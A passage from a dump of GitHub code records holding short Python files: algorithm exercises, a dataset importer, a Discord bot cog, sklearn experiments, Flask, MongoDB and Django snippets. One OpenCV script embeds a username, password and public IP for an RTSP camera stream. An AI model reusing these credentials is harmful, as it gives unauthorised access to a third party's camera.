포스/2798.py","file_name":"2798.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2870868848","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\nN = int(input())\n\nmap_ = [list(map(int, input().split())) for _ in range(N)]\n\nall_land_idx = []\n\nfor i in range(N):\n for j in range(N):\n if map_[i][j]: all_land_idx.append((i, j))\n\ndi, dj = [-1, 1, 0, 0], [0, 0, -1, 1]\n\nremain_land = set(all_land_idx[:])\ngroup_data = dict()\n\ndef grouping(start):\n queue = deque([start])\n grouped_idx = set()\n\n while queue:\n i, j = queue.popleft()\n\n map_[i][j] = group_number\n group_data[(i, j)] = group_number\n grouped_idx.add((i, j))\n\n for k in range(4):\n next_i, next_j = i+di[k], j+dj[k]\n if 0 <= next_i < N and 0 <= next_j < N and map_[next_i][next_j] == 1:\n queue.append((next_i, next_j))\n\n queue = []\n\n return grouped_idx\n\ngroup_number = 2\nwhile remain_land:\n remain_land -= grouping(remain_land.pop())\n group_number += 1\n\nmap_ = []\n\ndef step(start):\n queue = deque([(0, *start)])\n\n while queue:\n count, i, j = queue.popleft()\n\n for k in range(4):\n next_i, next_j = i+di[k], j+dj[k]\n\n if 0 <= next_i < N and 0 <= next_j < N:\n if (next_i, next_j) not in group_data:\n queue.append((count+1, next_i, next_j))\n\n elif group_data[start] != group_data[(next_i, next_j)]:\n return count\n\n return 10000\n\nresult = 10000\nfor start in all_land_idx:\n result = min(result, step(start))\n\nprint(result)\n","repo_name":"SimplePro/Algorithm","sub_path":"다리 만들기.py","file_name":"다리 만들기.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4693147438","text":"# coding: utf-8\n\nimport os\nfrom supervisely_lib.io.json import load_json_file\nimport supervisely_lib as sly\n\n\nclasses_dict = sly.ObjClassCollection()\n\n\ndef read_datasets(coord_file, dataset):\n src_datasets = {}\n if not os.path.isfile(coord_file):\n raise RuntimeError('There is no file {}, but it is necessary'.format(coord_file))\n sample_names = []\n with open(coord_file, \"r\") as file:\n all_lines = file.readlines()\n for line in all_lines:\n line = line.strip('\\n').split(',')[0]\n if line[0] != 'w':\n line = line[1:]\n sample_names.append(line[:-4])\n src_datasets[dataset] = sample_names\n sly.logger.info('Found source dataset with {} 
sample(s).'.format(len(sample_names)))\n return src_datasets\n\n\ndef read_words(word_file):\n words = {}\n with open(word_file, \"r\") as file:\n all_lines = file.readlines()\n for line in all_lines:\n word = line.strip('\\n').split(',')[1][2:-1]\n name = line.strip('\\n').split(',')[0]\n if name[0] != 'w':\n name = name[1:]\n words[name] = word\n return words\n\n\ndef read_coords(coord_file):\n coords = {}\n with open(coord_file, \"r\") as file:\n all_lines = file.readlines()\n for line in all_lines:\n name = line.strip('\\n').split(',')[0]\n line = line.strip('\\n').split(',')[1:]\n if name[0] != 'w':\n name = name[1:]\n line = list(map(lambda i: int(i), line))\n coords[name] = line\n return coords\n\n\ndef get_ann(img_path, coords, words):\n global classes_dict\n ann = sly.Annotation.from_img_path(img_path)\n class_name = 'text'\n color = [255, 0, 0]\n name = img_path.split('/')[-1]\n line = coords[name]\n points = [sly.PointLocation(line[i + 1], line[i]) for i in range(0, 8, 2)]\n polygon = sly.Polygon(exterior=points, interior=[])\n if not classes_dict.has_key(class_name):\n obj_class = sly.ObjClass(name=class_name, geometry_type=sly.Polygon, color=color)\n classes_dict = classes_dict.add(obj_class) # make it for meta.json\n ann = ann.add_label(sly.Label(polygon, classes_dict.get(class_name), None, words[name]))\n return ann\n\n\ndef convert():\n settings = load_json_file(sly.TaskPaths.TASK_CONFIG_PATH)\n out_project = sly.Project(os.path.join(sly.TaskPaths.RESULTS_DIR, settings['res_names']['project']),\n sly.OpenMode.CREATE)\n for dataset in ['train', 'test']:\n if dataset == 'train':\n imgs_dir = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_training_word_images_gt')\n coord_file = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_training_word_images_gt/coords.txt')\n word_file = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_training_word_images_gt/gt.txt')\n else:\n imgs_dir = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_test_word_images_gt')\n coord_file = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_test_word_images_gt/coords.txt')\n word_file = os.path.join(sly.TaskPaths.DATA_DIR, 'ch4_test_word_images_gt/gt.txt')\n\n src_datasets = read_datasets(coord_file, dataset)\n words = read_words(word_file)\n coords = read_coords(coord_file)\n for ds_name, sample_names in src_datasets.items():\n ds = out_project.create_dataset(ds_name) #make train -> img, ann\n progress = sly.Progress('Dataset: {!r}'.format(ds_name), len(sample_names)) # for logger\n for name in sample_names:\n src_img_path = os.path.join(imgs_dir, name + '.png')\n\n if all((os.path.isfile(x) or (x is None) for x in [src_img_path])):\n ann = get_ann(src_img_path, coords, words)\n ds.add_item_file(name, src_img_path, ann=ann)\n progress.iter_done_report()\n\n out_meta = sly.ProjectMeta(obj_classes=classes_dict)\n out_project.set_meta(out_meta)\n\n\ndef main():\n convert()\n sly.report_import_finished()\n\n\nif __name__ == '__main__':\n sly.main_wrapper('Incidentalscene2', main)\n","repo_name":"juzisedefeimao/supervisely","sub_path":"plugins/import/Incidentalscene2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"3254167013","text":"import asyncio\nimport logging\nimport os\nimport aiomysql\nimport imgkit\nimport discord\nimport traceback\nimport concurrent.futures\nimport functools\nfrom discord.ext import commands, tasks\nfrom yagoo.lib.dataUtils import botdb\n\nasync def milestoneCheck(pool: aiomysql.Pool):\n db 
= await botdb.getDB(pool)\n channels = await botdb.getAllData(\"channels\", (\"id\", \"name\", \"milestone\", \"image\"), db=db)\n scrape = await botdb.getAllData(\"scrape\", (\"id\", \"roundSubs\", \"mbanner\"), keyDict=\"id\", db=db)\n \n async def getSubs(channel: tuple, scrape: dict):\n if channel[\"milestone\"] < scrape[\"roundSubs\"]:\n if scrape[\"roundSubs\"] < 1000000:\n subtext = f'{int(scrape[\"roundSubs\"] / 1000)}K Subscribers'\n else:\n if scrape[\"roundSubs\"] == scrape[\"roundSubs\"] - (scrape[\"roundSubs\"] % 1000000):\n subtext = f'{int(scrape[\"roundSubs\"] / 1000000)}M Subscribers'\n else:\n subtext = f'{scrape[\"roundSubs\"] / 1000000}M Subscribers'\n return {\n \"id\": channel[\"id\"],\n \"name\": channel[\"name\"],\n \"image\": channel[\"image\"],\n \"banner\": scrape[\"mbanner\"],\n \"msText\": subtext,\n \"roundSubs\": scrape[\"roundSubs\"]\n }\n return None\n \n queue = []\n for channel in channels:\n if channel[\"id\"] in scrape:\n queue.append(getSubs(channel, scrape[channel[\"id\"]]))\n \n milestone = {}\n dbUpdate = []\n write = False\n results = await asyncio.gather(*queue)\n for result in results:\n if result:\n milestone[result[\"id\"]] = result\n dbUpdate.append((result[\"id\"], result[\"roundSubs\"]))\n write = True\n \n if write:\n await botdb.addMultiData(dbUpdate, (\"id\", \"milestone\"), \"channels\", db)\n \n return milestone\n\nasync def milestoneNotify(msDict: dict, bot: commands.Bot, maintenance: bool):\n db = await botdb.getDB(bot.pool)\n servers = await botdb.getAllData(\"servers\", (\"channel\", \"milestone\"), db=db)\n queue = []\n \n async def postMsg(channel: str, server: tuple):\n try:\n if not maintenance:\n await bot.get_channel(int(server[\"channel\"])).send(f'{msDict[channel][\"name\"]} has reached {msDict[channel][\"msText\"].replace(\"Subscribers\", \"subscribers\")}!', file=discord.File(f'milestone/generated/{channel}.png'))\n await bot.get_channel(int(server[\"channel\"])).send(\"おめでとう!\")\n else:\n print(f\"Milestone Post on {server['channel']}:\\n{msDict[channel]['name']} has reached {msDict[channel]['msText'].replace('Subscribers', 'subscribers')}!\\n\")\n except Exception as e:\n logging.error(\"Milestone - Failed to post on a server/channel!\", exc_info=True)\n \n for channel in msDict:\n if msDict[channel][\"banner\"] is not None:\n with open(\"milestone/milestone.html\") as f:\n msHTML = f.read()\n else:\n msDict[channel][\"banner\"] = \"\"\n with open(\"milestone/milestone-nobanner.html\") as f:\n msHTML = f.read()\n options = {\n \"enable-local-file-access\": \"\",\n \"encoding\": \"UTF-8\",\n \"quiet\": \"\"\n }\n msHTML = msHTML.replace('[msBanner]', msDict[channel][\"banner\"]).replace('[msImage]', msDict[channel][\"image\"]).replace('[msName]', msDict[channel][\"name\"]).replace('[msSubs]', msDict[channel][\"msText\"])\n with open(f\"milestone/{channel}.html\", \"w\", encoding=\"utf-8\") as f:\n f.write(msHTML)\n if not os.path.exists(\"milestone/generated\"):\n os.mkdir(\"milestone/generated\")\n imgkit.from_file(f\"milestone/{channel}.html\", f'milestone/generated/{channel}.png', options=options)\n os.remove(f\"milestone/{channel}.html\")\n for server in servers:\n milestone = await botdb.listConvert(server[\"milestone\"])\n if milestone:\n if channel in milestone:\n queue.append(postMsg(channel, server))\n \n await asyncio.gather(*queue)\n\ndef mcWrapper(pool: aiomysql.Pool):\n return asyncio.run(milestoneCheck(pool))\n\nclass msCycle(commands.Cog):\n def __init__(self, bot, maintenance):\n self.bot = bot\n 
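# maintenance flag: when True, milestoneNotify prints milestone posts instead of sending them to Discord\n 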
self.maintenance = maintenance\n \n @commands.Cog.listener()\n async def on_ready(self):\n self.timecheck.start()\n\n def cog_unload(self):\n self.timecheck.cancel()\n\n @tasks.loop(minutes=3.0)\n async def timecheck(self):\n logging.info(\"Starting milestone checks.\")\n try:\n with concurrent.futures.ThreadPoolExecutor() as pool:\n loop = asyncio.get_running_loop()\n msData = await loop.run_in_executor(pool, functools.partial(mcWrapper, self.bot.pool))\n if msData != {}:\n logging.info(\"Milestone - Notifying channels.\")\n await milestoneNotify(msData, self.bot, self.maintenance)\n except Exception as e:\n logging.error(\"Milestone - An error has occurred in the cog!\", exc_info=True)\n traceback.print_exception(type(e), e, e.__traceback__)\n else:\n logging.info(\"Milestone checks done.\")\n","repo_name":"ProgrammingPleb/yagoo_bot","sub_path":"yagoo/cogs/msCycle.py","file_name":"msCycle.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44182788702","text":"\"\"\"\r\nCase9. Given two integers: D (day) and M (month) that define a valid date in a non-leap year. Output the values of D and M for the date\r\nfollowing the given one\r\n\"\"\"\r\n\r\nD = int(input(\"Введите число: D - \"))\r\nM = int(input(\"Введите число: M - \"))\r\n\r\nCountDay = 0\r\n\r\nif M == 2:\r\n\tCountDay = 28\r\nelif M == 4 or M == 6 or M == 9 or M == 11:\r\n\tCountDay = 30\r\nelif M == 1 or M == 3 or M == 5 or M == 7 or M == 8 or M == 10 or M == 12:\r\n\tCountDay = 31\r\n\r\nif D < CountDay:\r\n\tD += 1\r\nelse:\r\n\tM = (M % 12) + 1\r\n\tD = 1\r\n\r\nprint(D)\r\nprint(M)\r\n","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"case(20)/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12595487807","text":"\r\nclass Weapon:\r\n def prick(self, obj): # this is the weapon's active skill: stab the target to death\r\n obj.life_value -= 500 # assume the attack power is 500\r\n\r\nclass Person: # define a Person class\r\n role = 'person' # every person's role attribute is 'person'\r\n\r\n def __init__(self, name, atk, life_value):\r\n self.name = name # every character has its own nickname;\r\n self.atk = atk # every character has its own attack power;\r\n self.life_value = life_value # every character has its own HP;\r\n self.weapon = Weapon() # bind a weapon to the character;\r\n\r\n def walk(self):\r\n print(self.name + ' is walking...')\r\n\r\n\r\n def attack(self, dog):\r\n # A person can attack a dog; the dog here is also an object.\r\n # When a person attacks a dog, the dog's HP drops according to the person's attack power\r\n dog.life_value -= self.atk\r\n\r\n\r\nclass Dog: # define a Dog class\r\n role = 'dog' # every dog's role attribute is 'dog'\r\n\r\n def __init__(self, name, breed, atk, life_value):\r\n self.name = name # every dog has its own nickname;\r\n self.breed = breed # every dog has its own breed;\r\n self.atk = atk # every dog has its own attack power;\r\n self.life_value = life_value # every dog has its own HP;\r\n\r\n def bite(self, people):\r\n print('dog bites the person')\r\n # A dog can bite a person; the dog here is also an object.\r\n # When a dog bites a person, the person's HP drops according to the dog's attack power\r\n people.life_value -= self.atk\r\n\r\n\r\nprint(Person.role) # inspect the role attribute of Person\r\nprint(Person.walk) # reference the walk method of Person; note that this is not a call\r\n\r\negg = Person('egon', 10, 1000) # ClassName() is equivalent to executing Person.__init__()\r\n# After __init__() finishes, an object is returned. The object is like a dict that stores the attributes and methods belonging to this person.\r\n# You can loosely think of it as: egg = {'name':'egon','walk':walk}\r\n\r\nha2 = Dog('二愣子', '哈士奇', 10, 1000) # create a real, concrete dog ha2\r\nprint('二哈初始血量:' + str(ha2.life_value)) # check ha2's HP\r\negg.attack(ha2) # egg hits ha2 once\r\nprint('二哈血量:' + str(ha2.life_value)) # 
ha2 lost 10 HP","repo_name":"EItByTe/pytorch_tutorial","sub_path":"class&object/class_object_test.py","file_name":"class_object_test.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11251370127","text":"# Matching class label: marital status\nfrom pyspark.sql import functions as F\nfrom tag.base.TemplateClass import AbstractBaseModel\nfrom tag.utils.TagLevel5Common import dataFrameToDict\n\n\n@F.udf\ndef marriageToTagsId(marriage, fiveDictStr):\n fiveDict = eval(fiveDictStr)\n # data values: '未婚' = unmarried, '已婚' = married, '离异' = divorced\n if marriage == '未婚':\n marriage = 1\n elif marriage == '已婚':\n marriage = 2\n elif marriage == '离异':\n marriage = 3\n\n return fiveDict[str(marriage)]\n\n\nclass Marriage(AbstractBaseModel):\n\n def compute(self,esDF, fiveDF):\n\n fiveDict = dataFrameToDict(fiveDF)\n newDF = esDF.select(esDF.user_id.alias('user_id'), marriageToTagsId(esDF.marriage_state, F.lit(str(fiveDict))).alias('tagsid'))\n\n return newDF\n\n\n# Marriage1 = Marriage('MarriageTask', 545)\n# Marriage1.execute()","repo_name":"DUTzimo/insurance_up","sub_path":"_02_insuranceup_script/BaoXian_Project/tag/policy_client/MarriageChild.py","file_name":"MarriageChild.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3507473495","text":"from flask import Flask, render_template, request\nfrom utils import fetch_data_from_api, get_data_for_moran, moran_local_regression, plot_folium_map\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n grid_id = request.form.get('grid_id')\n start_time = datetime.strptime(request.form.get('start_time'), '%Y-%m-%dT%H:%M')\n end_time = datetime.strptime(request.form.get('end_time'), '%Y-%m-%dT%H:%M')\n else:\n # Specify the grid_id\n grid_id = \"64b7baccf2b99f00296acd59\"\n start_time = datetime(2023, 10, 5, 9, 0, 0)\n end_time = datetime(2023, 11, 5, 9, 0, 0)\n\n page = 1\n\n # Call the function with the desired start and end times\n data = fetch_data_from_api(grid_id, start_time, end_time, page)\n\n if data:\n # Get the GeoDataFrame with relevant data\n gdf = get_data_for_moran(data)\n # Check if 'calibratedValue' is present before dropping NaN values\n if 'calibratedValue' in gdf.columns:\n print(\"Number of NaN values in calibratedValue:\", gdf['calibratedValue'].isna().sum())\n gdf = gdf.dropna(subset=['calibratedValue'])\n print(gdf.info())\n # Calculate Local Moran's I\n moran_loc = moran_local_regression(gdf)\n plot_folium_map(moran_loc, gdf)\n print(\"Local Moran's I saved in cluster_map.html\")\n # plot_moran_local(moran_loc, gdf)\n\n # Render the template with the Folium map and pass the gdf variable\n return render_template('index.html', gdf=gdf)\n\n else:\n print(\"No measurements for this search.\")\n return \"No measurements for this search.\"\n\n else:\n print(\"Failed to fetch data from the API.\")\n return \"Failed to fetch data from the API.\"\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('error.html', error_message=\"Page not found\"), 404\n\n# Custom error handler for general exceptions\n@app.errorhandler(Exception)\ndef handle_exception(e):\n return render_template('error.html', error_message=str(e)), 500\n\nif __name__ == '__main__':\n app.run(debug=True)\n 
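# Hypothetical usage sketch (assumes Flask's default host/port): with the server running,\n# the same analysis can be triggered by POSTing the form fields read above, e.g.\n# curl -X POST http://127.0.0.1:5000/ -d 'grid_id=64b7baccf2b99f00296acd59' -d 'start_time=2023-10-05T09:00' -d 'end_time=2023-11-05T09:00'\n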
","repo_name":"wabinyai/My_research-lab","sub_path":"src/local_moran_with_API/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3566177429","text":"\n###\n#\n# Constants used for the communication\n#\n# Ranges\n# Sensors 0x00 - 0x6F\n# Actuators 0x70 - 0xDF\n# Miscellaneous 0xE0 - 0xFF\n#\n###\n\n\n##\n#\n# Const for the Discovery Process\n#\n##\n\n# -- Sensors -- #\n\nSENSOR_TEMPERATURE = 0x01\nSENSOR_TEMP = 0x01\n\nSENSOR_HUMIDITY = 0x02\nSENSOR_HUM = 0x02\n\nSENSOR_LIGHT = 0x03\n\nSENSOR_COLOR = 0x04\n\n\n# -- Actuators -- #\n\nACTR_SERVO = 0x70\nACTR_PELTIER = 0x71\nACTR_LED = 0x72\nACTR_SIREN = 0x73\n\n\n# -- Predefined PORTS -- #\n\nPORT_DEBUG = 0xFE\nPORT_DISCOVERY = 0xFF","repo_name":"Baeshen/RasPiHome","sub_path":"pi/ctrl/python/src/lib/libCom.py","file_name":"libCom.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41893453442","text":"from pymongo import MongoClient\n#https://api.mongodb.com/python/current/tutorial.html\nfrom datetime import datetime\nimport json\nimport pandas as pd\n\nclass dbConnection:\n client = MongoClient()\n testhost = \"localhost\"\n testIP = 3001\n devURI = \"mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb\"\n prodURI = \"\"\n nameDB = \"\"\n nameCollection = \"\"\n\n def __init__(self, devEnv = True, DB = 'termestimate', collection='job_keywords'):\n\n if devEnv == True:\n self.client = MongoClient(self.devURI)\n else:\n self.client = MongoClient(self.prodURI)\n self.nameDB = self.client[DB]\n\n self.nameCollection = self.nameDB[collection]\n\n def insertData(self, jsonObject):\n self.nameCollection.insert_many(jsonObject)\n\n def returnUniqueQueryValues(self):\n return self.nameCollection.distinct(\"query\")\n\n def returnKeywordValues(self, query,limit_amount=75):\n return_amount =3\n\n result = self.nameCollection.find({\"query\":query, \"keyword_count\" : {\"$gte\" : 2}},{\"_id\": 0, \"time\":0 }).sort(\"keyword_count\", -1).limit(limit_amount)\n list_result = list(result)\n nouns = [x for x in list_result if x['POS'] == 'Noun'][: return_amount]\n print(\"nouns\")\n print(nouns)\n verbs = [x for x in list_result if x['POS'] == 'Verb'][: return_amount]\n print(\"verbs\")\n print(verbs)\n adjectives = [x for x in list_result if x['POS'] == 'Adjective'][: return_amount]\n print(\"adjectives\")\n print(adjectives)\n adverbs = [x for x in list_result if x['POS'] == 'Adverb'][: return_amount]\n print (list_result)\n topNum = list_result[0]['keyword_count']\n print(\"Top keyword count\")\n print(topNum)\n return ({\"all\":list_result,\"nouns\":nouns,\"verbs\":verbs,\"adjectives\":adjectives, \"adverbs\":adverbs,\"high_keyword\":topNum})\n\n def returnQueryValues(self, keyword, limit_amount=5):\n result = self.nameCollection.find({\"keyword\": keyword,\"Skill\":1}, {\"_id\": 0, \"time\": 0}).sort(\"keyword_count\", -1).limit(limit_amount)\n list_result = list(result)\n\n\n print (list_result)\n return (list_result)\n\n def insert_df(self, df):\n records = json.loads(df.T.to_json()).values()\n self.nameCollection.insert_many(records)\n\n def returnDirectory(self):\n result = self.nameCollection.find({} ,{\"_id\": 0})\n list_result = list(result)\n print (list_result)\n return 
(list_result)","repo_name":"dmeyers83/TermEstimate","sub_path":"databaseConnection.py","file_name":"databaseConnection.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23882214020","text":"# https://leetcode.com/problems/meeting-rooms\n\nclass Solution(object):\n def canAttendMeetings(self, intervals):\n \"\"\"\n :type intervals: List[List[int]]\n :rtype: bool\n \"\"\"\n min_rooms = 1\n \n # Time Complexity O(nlogn)\n # Space Complexity O(1)\n \n # 1. Sort the array based on end time\n new_intervals = sorted(intervals,key=lambda x: x[1])\n \n # For every interval:\n for i in range(1,len(new_intervals)):\n # Check if curr interval start time is less than prev interval end time\n if new_intervals[i][0] < new_intervals[i-1][1]:\n # Return False\n return False\n \n # If it reached the end, return True as the person can attend all meetings \n return True\n \n \n","repo_name":"sanafathima418/DSA-Practice","sub_path":"Meeting_Rooms.py","file_name":"Meeting_Rooms.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73940596967","text":"import cv2\nimport time\nfrom datetime import datetime\nimport getpass\n\n#imagesFolder = \"C:/Users//documents\"\n\n# https://stackoverflow.com/questions/842059/is-there-a-portable-way-to-get-the-current-username-in-python\nimagesFolder = \"./images\"\n\n#cap = cv2.VideoCapture(\"rtsp://username:password@cameraIP/axis-media/media.amp\")\n\n# Use public RTSP Streaming for testing, but I am getting black frames!\ncap = cv2.VideoCapture(\"rtsp://watch:ZimaLeto2022@93.188.122.139:554/cam/realmonitor?channel=1&subtype=0\")\nframeRate = cap.get(5) #frame rate\ncount = 0\n\n\nwhile cap.isOpened():\n start_time = time.time()\n\n frameId = cap.get(1) # current frame number\n ret, frame = cap.read()\n\n if (ret != True):\n break\n\n filename = imagesFolder + \"/image_\" + str(datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\")) + \".jpg\"\n cv2.imwrite(filename, frame)\n\n # Show frame for testing\n cv2.imshow('frame', frame)\n cv2.waitKey(1)\n\n count += 1\n\n #Break loop after 24*60 minus\n if count > 24*60:\n break\n\n elapsed_time = time.time() - start_time\n\n # Wait for 60 seconds (subtract elapsed_time in order to be accurate).\n time.sleep(60 - elapsed_time)\n\n\ncap.release()\nprint (\"Done!\")\n\ncv2.destroyAllWindows()\n","repo_name":"yrguba/recognition","sub_path":"rec.py","file_name":"rec.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69904786410","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 24 12:49:30 2018\n\n@author: Homagni\n\"\"\"\n'''\nREFERECES USED:\n http://scikit-learn.org/stable/auto_examples/ensemble/plot_adaboost_hastie_10_2.html#sphx-glr-auto-examples-ensemble-plot-adaboost-hastie-10-2-py\n http://scikit-learn.org/stable/auto_examples/classification/plot_classifier_comparison.html#sphx-glr-auto-examples-classification-plot-classifier-comparison-py\n http://scikit-learn.org/stable/modules/ensemble.html\n \n'''\nprint(__doc__)\nimport copy\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.decomposition import PCA\n\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import zero_one_loss\nfrom sklearn.ensemble import 
AdaBoostClassifier\n\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.ensemble import VotingClassifier\n\nnp.random.seed(11)\nclass ensembleLearners(object):\n def __init__(self,train,test,techniques,parameters):\n self.train=np.loadtxt(train,delimiter=',',skiprows=1) #First row is the metadata\n self.test=np.loadtxt(test,delimiter=',',skiprows=1) #First row is the metadata\n \n self.techniques=techniques\n self.parameters=parameters\n self.n_estimators = 400 #used in RF type models\n self.n_neighbors=200 #used in knn type models\n self.names=[]\n self.models=[]\n # A learning rate of 1. may not be optimal for both SAMME and SAMME.R\n self.learning_rate = 0.1\n def processData(self):\n self.x_train=self.train[:,0:4]\n self.y_train=self.train[:,-1]\n \n self.x_test=self.test[:,0:4]\n self.y_test=self.test[:,-1]\n #self.a = self.a[~np.isnan(self.a)] #sample usage to remove nans\n def Dstump(self):\n self.dt_stump = DecisionTreeClassifier(max_depth=1, min_samples_leaf=1)\n self.dt_stump.fit(self.x_train, self.y_train)\n self.dt_stump_err = 1.0 - self.dt_stump.score(self.x_test, self.y_test)\n \n def makemodel1(self): #make models for task 1\n self.ada_discrete = AdaBoostClassifier(base_estimator=self.dt_stump,learning_rate=self.learning_rate,n_estimators=self.n_estimators,algorithm=\"SAMME\") #Unfortunately scikit-learn does not have SAMME.M1\n self.rf=RandomForestClassifier(n_estimators=self.n_estimators, max_depth=1, min_samples_split=2, min_samples_leaf=1) #Random forest based on decision stumps\n \n self.names.extend(['ada_discrete','random_forest'])\n self.models.extend([self.ada_discrete,self.rf])\n def makemodel2(self): #make models for task 2\n self.NN=MLPClassifier(hidden_layer_sizes=(150,100,50,), activation='logistic', solver='adam', alpha=0.0001, batch_size='auto', learning_rate='constant', learning_rate_init=0.01, max_iter=200, shuffle=True, random_state=None, tol=0.0001, verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True, early_stopping=True)\n self.knn=KNeighborsClassifier(n_neighbors=self.n_neighbors, weights='distance',leaf_size=10, p=2, metric='minkowski')\n self.LR=LogisticRegression(penalty='l1', dual=False, tol=0.0001, C=0.1, fit_intercept=True, intercept_scaling=1, class_weight='balanced', random_state=None, solver='liblinear', max_iter=200, multi_class='ovr', verbose=0, warm_start=False, n_jobs=1)\n self.NB=BernoulliNB(alpha=0.8, binarize=0.02, fit_prior=False, class_prior=None)\n self.DT=DecisionTreeClassifier(criterion='gini', splitter='random', max_depth=4, min_samples_split=100, min_samples_leaf=50, min_weight_fraction_leaf=0.0, max_features=4, random_state=None, max_leaf_nodes=None, min_impurity_decrease=0.0, min_impurity_split=None, class_weight=None, presort=False)\n \n self.names.extend(['Neural networks','k-Nearest Neighbor','Logistic regression','Naive Bayes','Decision trees'])\n self.models.extend([self.NN,self.knn,self.LR,self.NB,self.DT])\n def makevoting(self,weights):\n a=copy.copy(self.names)\n b=copy.copy(self.models)\n if(not weights):\n self.vc=VotingClassifier([(n, m) for n, m in zip(a, b)], voting='hard', weights=None, n_jobs=1, flatten_transform=None)\n else:\n self.vc=VotingClassifier([(n, m) for n, m in zip(a, b)], voting='hard', weights=weights, n_jobs=1, 
flatten_transform=None)\n self.names.append('voting_classifier')\n self.models.append(self.vc)\n def fitmodels(self,start):\n if(start None:\n ''' Adds a dictionary entry {filename: {metadata}} to the\n metadata map.\n\n @params:\n - filename: the filename of the entry\n - metadata: reddit post metadata associated to the given filename\n '''\n self._metadata_map[filename] = metadata\n\n def get_map(self) -> dict:\n ''' Returns the metadata map composed of one or more\n {filename: reddit metadata}\n\n @return: dictionary of the following format\n {filename: {metadata}, filename: {metadata}, ...}\n\n Note: filenames are the keys of the map\n '''\n return self._metadata_map\n\n def show_metadata(self, filename: str):\n ''' Prints to the console the Reddit post metadata associated\n with the given @filename if it is found.\n '''\n try:\n with open(self.json_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n if filename in data.keys():\n print('\\n')\n pprint(data[filename])\n else:\n self.log.info(f'Metadata for `{filename}` not found')\n except IOError:\n self.log.info('Database not found. Must download content first')\n\n def show_link(self, filename: str):\n ''' Prints to the console the Reddit post URL link of the given\n media filename.\n '''\n try:\n with open(self.json_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n if filename in data.keys():\n print(f\"\\nLink: {data[filename]['Link']}\")\n else:\n self.log.info(f'Metadata for `{filename}` not found')\n except IOError:\n self.log.info('Database not found. Must download content first')\n","repo_name":"emanuel2718/myredditdl","sub_path":"myredditdl/metadata_handler.py","file_name":"metadata_handler.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"952893534","text":"import base64\nimport datetime\nimport numbers\nfrom io import BytesIO\n\nimport matplotlib.pyplot\nimport matplotlib.pyplot as plt\nimport pandas\nimport sqlalchemy\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nfrom django.views.generic import DetailView\nfrom django.conf import settings\nfrom pandas import DataFrame\nfrom pandas.api.types import is_numeric_dtype\nfrom django.utils import timezone\nfrom sqlalchemy.exc import ResourceClosedError\n\nfrom users.models import Profile\nfrom ..common.access import user_can_access_query\nfrom ..common.components import users_recent_results\nfrom ..models import Query, Parameter, Result, Value, QueryError\n\nmax_table_rows = settings.MAX_TABLE_ROWS\nimage_encoding = 'jpg'\nempty_df_message = 'Query successful.'\n\n# So that server does not create (and then destroy) GUI windows that will never be seen\nmatplotlib.pyplot.switch_backend('Agg')\n\n\nclass ResultDetailView(LoginRequiredMixin, DetailView):\n model = Result\n context_object_name = 'result'\n\n def get_object(self, queryset=None):\n user = self.request.user\n result = get_object_or_404(Result, id=self.kwargs.get('pk'))\n user_can_access_query(user, result.query)\n 